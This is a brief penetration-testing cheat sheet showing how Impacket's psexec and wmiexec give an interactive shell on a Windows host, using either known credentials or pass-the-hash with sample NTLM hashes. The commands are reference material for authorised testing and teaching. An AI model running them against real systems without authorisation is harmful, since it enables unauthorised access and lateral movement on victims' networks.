Login Windows Shell
Last modified: 2023-11-11
If we have credentials for target Windows system, we can execute commands from Linux machine.
Impacket PsExec
PsExec gives us an interactive shell on the Windows host.
impacket-psexec username:password@<target-ip>
# Pass the Hashes
impacket-psexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d username@10.0.0.1
Impacket WmiExec
WmiExec uses Windows Management Instrumentation (WMI) to give us an interactive shell on the Windows host.
impacket-wmiexec example.local/username@10.0.0.1
# Pass the Hashes
impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1